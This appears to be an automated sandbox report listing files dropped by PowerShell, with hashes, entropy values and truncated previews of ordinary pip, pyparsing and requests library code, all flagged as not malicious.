                                                                                                    Preview:........=.Cf.^..............................d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.Z...e.e.........Z...e.d.d.e.f.d.e.j(..................e.j*......................f.d.e.f.g.........Z.....e.d.........Z...G.d...d.e.j2..........................Z...G.d...d.e.j2..........................Z...G.d...d.e.e.............Z.d,d.e.e.....d.e.f.d...Z.d.d.d.e.f.d...Z.........d-d.e.j>..................d.e.j(..................e ....d.e.d.e!d.e!d.e.e.....f.d...Z"d.e.d.e.e.j>......................d.e!f.d ..Z#..G.d!..d"........Z$..G.d#..d$........Z%d.e.j>..................d.e!f.d%..Z&d&..Z'd.e.e.j>......................f.d'..Z(e'............d.d.e.j>..................d(e.j(..................e.....d)e%d.e.d.e.d*e.d.e!d.e!d.e.j(..................e.....f.d+..........Z)y.)/.....N)...pyparsing)...List..NamedTuple..Generic..TypeVar..Dict..Callable..Set..Iterable)...Template)...StringIOa....{% if not embed %}.<!DOCTYPE html>.<html>.<head>.{% endif %}.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9523
                                                                                                    Entropy (8bit):4.350560699979647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:AwQZVA6dvk/Rh5ULmzBBMbVxtzvk/OYHtolo2:AjZVN+RvUKjMhobj2
                                                                                                    MD5:D766F5ADC5EEA0117932CCE82A2574A5
                                                                                                    SHA1:33F826B5F61CB81EACA0761A76D4C5BF3FD29DED
                                                                                                    SHA-256:E8973A5B5783641CF216ED49D18ADC74D155042F9120DBA3666BDE4A707C471C
                                                                                                    SHA-512:6974C8D151ECEF30145FE784D0BA61A68B2C67EDE5C686241232192D6BE0D01301B3C2B9363A4C20D3383BD8250AE51A75764B4ABB033532A3B0F08DDC6983AE
                                                                                                    Malicious:false
                                                                                                    Preview:# exceptions.py..import re.import sys.import typing..from .util import (. col,. line,. lineno,. _collapse_string_to_ranges,. replaced_by_pep8,.).from .unicode import pyparsing_unicode as ppu...class ExceptionWordUnicode(ppu.Latin1, ppu.LatinA, ppu.LatinB, ppu.Greek, ppu.Cyrillic):. pass..._extract_alphanums = _collapse_string_to_ranges(ExceptionWordUnicode.alphanums)._exception_word_extractor = re.compile("([" + _extract_alphanums + "]{1,16})|.")...class ParseBaseException(Exception):. """base exception class for all parsing runtime exceptions""".. loc: int. msg: str. pstr: str. parser_element: typing.Any # "ParserElement". args: typing.Tuple[str, int, typing.Optional[str]].. __slots__ = (. "loc",. "msg",. "pstr",. "parser_element",. "args",. ).. # Performance tuning: we construct a *lot* of these, so keep this. # constructor as small and fast as possible. def __init__(. self,. pstr: st
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38646
                                                                                                    Entropy (8bit):4.656417128130297
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:8ukgqBqNGJZreajVVlz8DoGQxMntYl8XqDBroDe76Y:8CqgNGJZreajV7zmFSDl8Xqtci
                                                                                                    MD5:AFA5F059CAF348C09B7C940BDB477F16
                                                                                                    SHA1:9C5C1546309D245E734F49C2FA0AF6050E992C66
                                                                                                    SHA-256:059247080F124B4A588A8DF428641373DC36A8C39A2B862967B85CBC76E74E09
                                                                                                    SHA-512:F61AB3627F105345BDAE9C1EDFE225D648987D424EA0CF76FC50CEF2A5941E5CD05BEACFBE3620F537944812E0627D0D1DD40E004DC69099FA8297C8150E84A6
                                                                                                    Malicious:false
                                                                                                    Preview:# helpers.py.import html.entities.import re.import sys.import typing..from . import __diag__.from .core import *.from .util import (. _bslash,. _flatten,. _escape_regex_range_chars,. replaced_by_pep8,.)...#.# global helpers.#.def counted_array(. expr: ParserElement,. int_expr: typing.Optional[ParserElement] = None,. *,. intExpr: typing.Optional[ParserElement] = None,.) -> ParserElement:. """Helper to define a counted list of expressions... This helper defines a pattern of the form::.. integer expr expr expr..... where the leading integer tells how many expr expressions follow.. The matched tokens returns the array of expr tokens as a list - the. leading count token is suppressed... If ``int_expr`` is specified, it should be a pyparsing expression. that produces an integer value... Example::.. counted_array(Word(alphas)).parse_string('2 ab cd ef') # -> ['ab', 'cd'].. # in this parser, the leading integer value is give
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26692
                                                                                                    Entropy (8bit):4.204400723970669
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:GmJUTRSwOjIST4QY67UNkeEbf7CLulGcvb2HgmxbHc/IWhKRz:GmJUTn167Oke0jl1vbOgMY/Ix
                                                                                                    MD5:502DA695A726CFE3CB2735CC31B56A3E
                                                                                                    SHA1:BE84B1B49E3828EC37D7F4B2FFE52F7BFC997815
                                                                                                    SHA-256:F5DCAA43EC373237E6C566C5B7C2843D4E887D77B245DA16A763A0F34DAB5106
                                                                                                    SHA-512:396E5F5060778AFC4EB9FC8373F6041707E74085A4DD714A8A8734F26635BFE511499642C931DB311E10A268E91E817FC322A5440C9A64FE09BE125C4AFED20E
                                                                                                    Malicious:false
                                                                                                    Preview:# results.py.from collections.abc import (. MutableMapping,. Mapping,. MutableSequence,. Iterator,. Sequence,. Container,.).import pprint.from typing import Tuple, Any, Dict, Set, List..str_type: Tuple[type, ...] = (str, bytes)._generator_type = type((_ for _ in ()))...class _ParseResultsWithOffset:. tup: Tuple["ParseResults", int]. __slots__ = ["tup"].. def __init__(self, p1: "ParseResults", p2: int):. self.tup: Tuple[ParseResults, int] = (p1, p2).. def __getitem__(self, i):. return self.tup[i].. def __getstate__(self):. return self.tup.. def __setstate__(self, *args):. self.tup = args[0]...class ParseResults:. """Structured parse results, to provide multiple means of access to. the parsed data:.. - as a list (``len(results)``). - by list index (``results[0], results[1]``, etc.). - by attribute (``results.<results_name>`` - see :class:`ParserElement.set_results_name`).. Example::.. integer = Word(
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13488
                                                                                                    Entropy (8bit):4.1543808981423656
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Zz3aqFdLGsdiBvo9NdnzV6SSMj7QT1hsq1aNnm58fyI1hY/rMi5lXSy1+DuT0x:Zz35FWho93L7QTNw1hwrHD+ST0x
                                                                                                    MD5:090655DAAB366F55D2D0B8BFFEB969B7
                                                                                                    SHA1:0F2A7BAA07027F68D8A500B4184FE593C2299BDD
                                                                                                    SHA-256:7899DC834A7CDF39B51533EF33D6AE353EA86AF22F5DA89B9911437F5AA6C246
                                                                                                    SHA-512:12F5BE3D6C675CD669E4C7A1804540F3E8D2A5E117863FAB0E61E9363AA54EF7E177265D2B95370C2D0769F46982E094CDA9322BD5FE94ED1D4D4EDA4CB9A23B
                                                                                                    Malicious:false
                                                                                                    Preview:# testing.py..from contextlib import contextmanager.import typing..from .core import (. ParserElement,. ParseException,. Keyword,. __diag__,. __compat__,.)...class pyparsing_test:. """. namespace class for classes useful in writing unit tests. """.. class reset_pyparsing_context:. """. Context manager to be used when writing unit tests that modify pyparsing config values:. - packrat parsing. - bounded recursion parsing. - default whitespace characters.. - default keyword characters. - literal string auto-conversion class. - __diag__ settings.. Example::.. with reset_pyparsing_context():. # test that literals used to construct a grammar are automatically suppressed. ParserElement.inlineLiteralsUsing(Suppress).. term = Word(alphas) | Word(nums). group = Group('(' + term[...] + ')').. # assert that the '()' characte
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10646
                                                                                                    Entropy (8bit):4.603560836419799
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XZ/nCtDWwPb9kcY1beTSxgRMnUM7/eyI+I3ZKJlyoAARXs/HpieVslhNoRC:XRCtD5zigeUM7Wyr6ZME5klYC
                                                                                                    MD5:C597338A8AB008CD21175E408E19F830
                                                                                                    SHA1:EF897E3A62B1D972E1DD3525DADF04A6DFE7B791
                                                                                                    SHA-256:7C03DDB098804456E43C08A1E8D918AF2D1DA63E233EA7A5195325138C16156F
                                                                                                    SHA-512:F93EB2349DDB5D932D8BCD9F17DF6929BA0ACF644F0FCE2CE8C4F34F682B4DEABBB5F6815A9ABA56651B6A74BF817762484E77D7B0C37B911E620088D4CE244B
                                                                                                    Malicious:false
                                                                                                    Preview:# unicode.py..import sys.from itertools import filterfalse.from typing import List, Tuple, Union...class _lazyclassproperty:. def __init__(self, fn):. self.fn = fn. self.__doc__ = fn.__doc__. self.__name__ = fn.__name__.. def __get__(self, obj, cls):. if cls is None:. cls = type(obj). if not hasattr(cls, "_intern") or any(. cls._intern is getattr(superclass, "_intern", []). for superclass in cls.__mro__[1:]. ):. cls._intern = {}. attrname = self.fn.__name__. if attrname not in cls._intern:. cls._intern[attrname] = self.fn(cls). return cls._intern[attrname]...UnicodeRangeList = List[Union[Tuple[int, int], Tuple[int]]]...class unicode_set:. """. A set of Unicode characters, for language-specific strings for. ``alphas``, ``nums``, ``alphanums``, and ``printables``.. A unicode_set is defined by a list of ranges in the Unicode character. set, in a class
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8670
                                                                                                    Entropy (8bit):4.52628162624378
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6mujyjYUceklDJfctkDB/7kkcNb/IjEoAHukt/nTaj:B8uUIkcOjzXz
                                                                                                    MD5:98446240BEF4E0F94DD082E933FFC8ED
                                                                                                    SHA1:D3A1B5E8AC661F741153B0757CE509530F59DDE5
                                                                                                    SHA-256:BD33334DDC120F257C77F75282AB944DD5A0045A00FD6DF49DFC44243B2C8514
                                                                                                    SHA-512:02EE65A2FA37B4D7C635E477DBFDE790BE69393DF69F87C743780A314896995827FC00FA3390FF80623D7368BB399344A19670B5716CA2692D3E2D2DC058913B
                                                                                                    Malicious:false
                                                                                                    Preview:# util.py.import inspect.import warnings.import types.import collections.import itertools.from functools import lru_cache, wraps.from typing import Callable, List, Union, Iterable, TypeVar, cast.._bslash = chr(92).C = TypeVar("C", bound=Callable)...class __config_flags:. """Internal class for defining compatibility and debugging flags""".. _all_names: List[str] = []. _fixed_names: List[str] = []. _type_desc = "configuration".. @classmethod. def _set(cls, dname, value):. if dname in cls._fixed_names:. warnings.warn(. f"{cls.__name__}.{dname} {cls._type_desc} is {str(getattr(cls, dname)).upper()}". f" and cannot be overridden",. stacklevel=3,. ). return. if dname in cls._all_names:. setattr(cls, dname, value). else:. raise ValueError(f"no such {cls._type_desc} {dname!r}").. enable = classmethod(lambda cls, name: cls._set(name, True)). disable =
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):491
                                                                                                    Entropy (8bit):4.738310974542705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iRdkQf0RaPpNmJiAiQmlPR/cRfPRM8OepOik3wHNdzmlPMgUfPMqZJR:Ig0pNmTiVPREZPRAepOikAt8PBoPz3R
                                                                                                    MD5:80C061091A6382818848B1B371DC2EB8
                                                                                                    SHA1:DF65D428064B7C8E03726669E00C2E42450C227C
                                                                                                    SHA-256:9027A19B2D146816BDA15303ED9219AE7B307E73F72D767996F9CD2402F92413
                                                                                                    SHA-512:680DF062D390CF1092B0A13D8FC1013F557C272C26F58C8EBD79A8CF625741705FC7517C47BDF019F866E75D8B9F16A1E0FF44CC1FE462DB6C3C6CE55EF160BA
                                                                                                    Malicious:false
                                                                                                    Preview:"""Wrappers to call pyproject.toml-based build backend hooks.."""..from ._impl import (. BackendInvalid,. BackendUnavailable,. BuildBackendHookCaller,. HookMissing,. UnsupportedOperation,. default_subprocess_runner,. quiet_subprocess_runner,.)..__version__ = '1.0.0'.__all__ = [. 'BackendUnavailable',. 'BackendInvalid',. 'HookMissing',. 'UnsupportedOperation',. 'default_subprocess_runner',. 'quiet_subprocess_runner',. 'BuildBackendHookCaller',.].
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):624
                                                                                                    Entropy (8bit):5.443806485555198
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:0JSBdxLzRdPziupFP0mlPGUfPXtvnxOs1nXImaFFjaOtCJ6:0J61riupFPhPRPHOk3rOtCg
                                                                                                    MD5:001FE3ADA336CE682A9839608E13EFFD
                                                                                                    SHA1:649DA3BABC8C083D76BEA593B79ED84049BA0E31
                                                                                                    SHA-256:C1F005428F012F5E8D2B27472FB111F9CEE6D36637EE6E390F94AD092B215A41
                                                                                                    SHA-512:C65399E44868C31AF01D90C1BC85266EFCD97A5D545FD8CB83EE8366CD2149A272B9085EC487DE2BA39BEBC60031DC3BC7625B1B0A854053D0D49A60D36B19C6
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................8.....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.Z.g.d...Z.y.).z;Wrappers to call pyproject.toml-based build backend hooks.......)...BackendInvalid..BackendUnavailable..BuildBackendHookCaller..HookMissing..UnsupportedOperation..default_subprocess_runner..quiet_subprocess_runnerz.1.0.0).r....r....r....r....r....r....r....N)...__doc__.._implr....r....r....r....r....r....r......__version__..__all__........pC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyproject_hooks/__init__.py..<module>r........s'..........................................r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):385
                                                                                                    Entropy (8bit):5.234207300386857
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:rPC1SBHJcyJieMtvlcicdFO4b8un23d6oAreaF5f0aptM3F3Er:u1SBHSy05ui8b8XImaF5f0ajM13i
                                                                                                    MD5:E55EBF36B7F092C5D0211AD0ED140548
                                                                                                    SHA1:474182FB37D67E95BF237E16C6F7FE6624F49663
                                                                                                    SHA-256:38DBB6F730E8FC218B92BAC33EE692AD78CD72AA1AE7F5533FD346F3571646D8
                                                                                                    SHA-512:0A838B15D5E771D8497B6E1C73D6ECF8241DBD3AD666E2632BA4E46A3A3DEC43E5226411A02D80D1E5D6929949830EB368F5E06952B448111E47C8AA3A9089A8
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................D.....d.Z.d.d.l.Z.e.j...................d.k\..r.d.d.l.Z.y.d.d.l.m.Z...y.).)...tomllib.....N)...........)...tomli)...__all__..sys..version_infor......pip._vendorr............oC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyproject_hooks/_compat.py..<module>r........s!..........................w........,r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14736
                                                                                                    Entropy (8bit):5.30768544645491
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:KHZWAjaI7lEiubTqSlqWcpUU/IfgcYlFVQq1mZHe:KHAnClL52cdQfHqEZ+
                                                                                                    MD5:1153AFC042824115CBB8296D6DD7ABA6
                                                                                                    SHA1:D7E30445C0DA81035DD444790C70BC953E9CE1B4
                                                                                                    SHA-256:99A2194CF344A560F384230488C39FC894BAA5FAC520B5B34462A6008A5DFD3E
                                                                                                    SHA-512:94E1B0F3BC0609902E649C33E2EF746CEDE91A56CA86CECBD953414309CE62F8F029941E3FE5426A07FE7672EFF856A9DC9FCB999B59A29B7F15A90C0358073E
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d...Z.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d.d...Z.d.d...Z.d...Z...G.d...d.........Z.y.)......N)...contextmanager)...abspath)...join)...STDOUT..check_call..check_output.....)..._in_proc_script_pathc.....................x.....t.........|.d.d...........5.}.t.........j...................|.|.f.i.|.......d.d.d...........y.#.1.s.w...Y.....y.x.Y.w.).N..w..utf-8....encoding)...open..json..dump)...obj..path..kwargs..fs.... .mC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyproject_hooks/_impl.py..write_jsonr........s8.........d.C.'..*....$.a........#.q..#.F..#....$....$....$.s......0...9.c.....................r.....t.........|.d...........5.}.t.........j...................|.........c.d.d.d...........S.#.1.s.w...Y.....y.x.Y.w.).Nr....r....).r....r......load)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):138
                                                                                                    Entropy (8bit):4.385609497824286
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:UFoNJJJQJFyCFYTFLCbQWgVHXMoQewMPsWAffDXKqTA8gXRe1+CRK5Pn:U6HJQJFyG+uQNHcoQ34sHfWoMeGn
                                                                                                    MD5:6D627346B01079D32B8133AE1C9B6E4E
                                                                                                    SHA1:9141192D3B9BB789D002285A8CBFD788642AACEE
                                                                                                    SHA-256:6F2E9EBEB627AA48AC88CF8C41CBCE2ACE5B80333394E4A066A44736A7F4E331
                                                                                                    SHA-512:90E0E380125496F78FCC9DC2AE56892937D1079CBED280B7B02D875058DF172457F519EE7C6CE1C77E2514A45B671D544FD2C58D7187A24C0063981BCEAACEEA
                                                                                                    Malicious:false
                                                                                                    Preview:__all__ = ("tomllib",)..import sys..if sys.version_info >= (3, 11):. import tomllib.else:. from pip._vendor import tomli as tomllib.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11920
                                                                                                    Entropy (8bit):4.494420623569677
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:su1MmfbQ8wn3F3FQzUu/89q4gyqfy1ahERxn:su1zbQ8wnJS4u/89q4gyqfy1H
                                                                                                    MD5:7006214C597EC31BD685C4C7A809EDF7
                                                                                                    SHA1:1E5A9D8DC86AF078F0C244032DB980B0FD11C34C
                                                                                                    SHA-256:EB5189C73422A742089E1B8EEBD648E466CD43CD97103501FF51A0E7F2AD5287
                                                                                                    SHA-512:116B645B6699211DD08E27EC87A2613CF72CF5CDF92F47EAD33FB36CA9BFA72B4EE02222DEE9AA783D83AF074A1932C3E550B8E63825790401D31246534106AC
                                                                                                    Malicious:false
                                                                                                    Preview:import json.import os.import sys.import tempfile.from contextlib import contextmanager.from os.path import abspath.from os.path import join as pjoin.from subprocess import STDOUT, check_call, check_output..from ._in_process import _in_proc_script_path...def write_json(obj, path, **kwargs):. with open(path, 'w', encoding='utf-8') as f:. json.dump(obj, f, **kwargs)...def read_json(path):. with open(path, encoding='utf-8') as f:. return json.load(f)...class BackendUnavailable(Exception):. """Will be raised if the backend cannot be imported in the hook process.""". def __init__(self, traceback):. self.traceback = traceback...class BackendInvalid(Exception):. """Will be raised if the backend is invalid.""". def __init__(self, backend_name, backend_path, message):. super().__init__(message). self.backend_name = backend_name. self.backend_path = backend_path...class HookMissing(Exception):. """Will be raised on missing hooks (if a
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):546
                                                                                                    Entropy (8bit):4.551389317479523
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:EaZbaCAUTvAsJUxViQg9SViwsgQ095BeA0M5L35Buo1OQ6mLv:9fTv9utiSVxQKn0M5JrTv
                                                                                                    MD5:44AE0A51F674AF325CF2B1913EE32DB7
                                                                                                    SHA1:D594EACE41476837A85468E99AF3A31514CFA7C4
                                                                                                    SHA-256:F604004E9B5B1647A5908CB439F5851000B3AB15C93100D6087F6B04E0195704
                                                                                                    SHA-512:7A9886DBC641ABED170F179C9CED022665D87159DC90A8FE9014D0E8DD20250548DF80B8687B6439D51EC493BA853BDE088A05848CC72E406E543C3719DF1B0F
                                                                                                    Malicious:false
                                                                                                    Preview:"""This is a subpackage because the directory is on sys.path for _in_process.py..The subpackage should stay as empty as possible to avoid shadowing modules that.the backend might import.."""..import importlib.resources as resources..try:. resources.files.except AttributeError:. # Python 3.8 compatibility. def _in_proc_script_path():. return resources.path(__package__, '_in_process.py').else:. def _in_proc_script_path():. return resources.as_file(. resources.files(__package__).joinpath('_in_process.py')).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1091
                                                                                                    Entropy (8bit):5.0356463341252775
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:YrNfTv9uudz1s3n6C7kaqkj2tYl5Bq4zo:YrNfpueih1qkyYl5B5c
                                                                                                    MD5:969908330BF11AC4B62DE11F7B083E0F
                                                                                                    SHA1:318FC2801D3E1BF12DDD00FADF2154205E6CDDA3
                                                                                                    SHA-256:9B6DE42BB2625483F11715F035792F2D281F4D5D0D7EDB05A1E2A3900BDC6AD7
                                                                                                    SHA-512:E514E12979643258749D2C0B62C000E9AB0E30C2094551E8AFB266E57E95D1A601009B1516B30AF81B958E14246BF77A288B03A9249E86659C328A0A951F0E7B
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf".........................P.....d.Z.d.d.l.m.Z.....e.j.....................d...Z.y.#.e.$.r...d...Z.Y.y.w.x.Y.w.).z.This is a subpackage because the directory is on sys.path for _in_process.py..The subpackage should stay as empty as possible to avoid shadowing modules that.the backend might import.......Nc.....................x.....t.........j...................t.........j...................t.................j...................d.................S...Nz._in_process.py)...resources..as_file..files..__package__..joinpath........|C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyproject_hooks/_in_process/__init__.py.._in_proc_script_pathr........s/.......... .. ....O.O.K..(..1..1.2B..C....E.....E.r....c.....................6.....t.........j...................t.........d.........S.r....).r......pathr....r....r....r....r....r........s..........~.~.k.+;..<..<r....)...__doc__..importlib.resourcesr....r....r......AttributeErrorr....r....r......<mod
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14408
                                                                                                    Entropy (8bit):5.296575156302075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:s4Ldtwiw2duY1ZeDMqlJEiJD/x+h3c9ph3G+7X5t4PyGCow:skaMdp144KJbJD/xe3+jG1t1w
                                                                                                    MD5:FB3D7FB30CC095E27534CEE71298A29C
                                                                                                    SHA1:FE53EEF7792242F04BD6782BD84E409BE62B60CA
                                                                                                    SHA-256:946DEE5824499C27D50534EA82D683A6CEEA6129F83FBE66CEBAB042963578A3
                                                                                                    SHA-512:B2A5A5EE332BDAEB5B6B91B3C92B6FBE6EB48766D2074583335BC504E37D4231188EDEAE9B906F4CD3716CA6644A7A8725030CA9BDE58CDE74BB4637662636CB
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.*........................b.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.Z.d...Z.d...Z.d...Z.d$d...Z.d$d...Z.d...Z ..G.d...d.e.........Z!..G.d...d.e.........Z"d ..Z#h.d!..Z$d"..Z%e&d#k(..r...e%..........y.y.)%ag...This is invoked in a subprocess to call the build backend hooks...It expects:.- Command line args: hook_name, control_dir.- Environment variables:. PEP517_BUILD_BACKEND=entry.point:spec. PEP517_BACKEND_PATH=paths (separated with os.pathsep).- control_dir/input.json:. - {"kwargs": {...}}..Results:.- control_dir/output.json. - {"return_val": ...}......N)...glob)...import_module)...joinc.....................x.....t.........|.d.d...........5.}.t.........j...................|.|.f.i.|.......d.d.d...........y.#.1.s.w...Y.....y.x.Y.w.).N..w..utf-8....encoding)...open..json..dump)...obj.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10927
                                                                                                    Entropy (8bit):4.737449442563281
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:mdQeWwXEbynViulapd+jJ/lBR0lJHgCPu+NORhUh0RMzlwUtn8pM:SQ62+Jt0lJnxNOpYtn8a
                                                                                                    MD5:4D0D470C8151CA2901F01D696E0E3F8B
                                                                                                    SHA1:B188AAE41334AB7DED5AA1C9C992779FEA0127EB
                                                                                                    SHA-256:9B66F7E1CF75EC85B9A3E43FE936081E5B0AF6549494D8B2AC84D3507FF3C1EC
                                                                                                    SHA-512:4BD82327241C5E7F70DF26F92E388C4B284A42CFE1DA085F492EFD862B58522438C877F5E5CF42B318526AEA593BA832CAA1A53836614AE9F28D28724E0FD5E3
                                                                                                    Malicious:false
                                                                                                    Preview:"""This is invoked in a subprocess to call the build backend hooks...It expects:.- Command line args: hook_name, control_dir.- Environment variables:. PEP517_BUILD_BACKEND=entry.point:spec. PEP517_BACKEND_PATH=paths (separated with os.pathsep).- control_dir/input.json:. - {"kwargs": {...}}..Results:.- control_dir/output.json. - {"return_val": ...}.""".import json.import os.import os.path.import re.import shutil.import sys.import traceback.from glob import glob.from importlib import import_module.from os.path import join as pjoin..# This file is run as a script, and `import wrappers` is not zip-safe, so we.# include write_json() and read_json() from wrappers.py....def write_json(obj, path, **kwargs):. with open(path, 'w', encoding='utf-8') as f:. json.dump(obj, f, **kwargs)...def read_json(path):. with open(path, encoding='utf-8') as f:. return json.load(f)...class BackendUnavailable(Exception):. """Raised if we cannot import the backend""". def __i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5169
                                                                                                    Entropy (8bit):4.874553924231789
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:7peYVGivM4SAAAmo7146JlABKAF2rrK2As4+A+I+AxQSEsNiZi0Xoy2Psv:7bMS7deeWP1Z1R+Exk/
                                                                                                    MD5:CB08F1B2F9A15B532E967790852650C1
                                                                                                    SHA1:A86FD9B261BD085B254467C9B7AE83C0E7E1B7C2
                                                                                                    SHA-256:A30BA3A1BE1D938E528B2E0462D6C2291EB0705A61EC4D386BFBFF3AE01A7010
                                                                                                    SHA-512:6F2E92DB6E04F14F945309368C7706A29D6C33F8B68571DD16E13B240EFC3EDA55093821557FA719A5AAC76D3D1BE6B70A60E55331DA949A4C15431A5B991E3B
                                                                                                    Malicious:false
                                                                                                    Preview:# __.# /__) _ _ _ _ _/ _.# / ( (- (/ (/ (- _) / _).# /..""".Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2'). >>> r = requests.post('https://httpbin.org/post', data=payload). >>> print(r.text). {. .... "form": {. "key1": "value1",. "key2": "value2". },. .... }..The other HTTP methods are supported - see `requests.api`. Full documentation.is at <https://requests.readthedocs.io>...:copyright: (c) 2017 by Kenneth Reitz..:license: Apache 2.0, see LICENSE for more details.."""..import warnings..from pip._vendor import urllib3..from .exceptions import RequestsDependencyWarning..charset_normalizer_version = None..try:. fro
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5464
                                                                                                    Entropy (8bit):5.855258953654303
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:9ynPj0meYVGivMKF/Ih2mpNgSdAho4rsCxwD49bWQXaN4yIoajQ3a2Kpf:9yLjMKmLgSeh59q09vqN7h3a2Kpf
                                                                                                    MD5:31642365CDDD157E13AB3206E7BBD9FA
                                                                                                    SHA1:97C7E2CE8B06E578F45FF3BA05B119DBC7E05E98
                                                                                                    SHA-256:E7D22962A4B2B66778095A34F89B3314677036275C7D60AAFCA368141EEDCFCF
                                                                                                    SHA-512:BECE064AD330BD5C7255241BF277E4E37ABBA1F4966811E8978726CE5FFF2A581E3460DF1A0C7B2E1879D42B2E5BA5CD076043DC32FBC996733484C9EA62F347
                                                                                                    Malicious:false
